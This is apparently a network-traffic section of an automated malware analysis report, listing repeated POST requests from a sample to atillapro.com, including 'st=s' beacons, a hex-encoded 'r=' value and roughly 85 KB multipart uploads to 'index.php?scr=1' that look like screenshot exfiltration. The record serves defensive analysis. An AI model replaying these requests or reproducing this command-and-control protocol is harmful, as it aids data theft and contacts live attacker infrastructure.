Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODg0MTU=Host: atillapro.comContent-Length: 88567Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
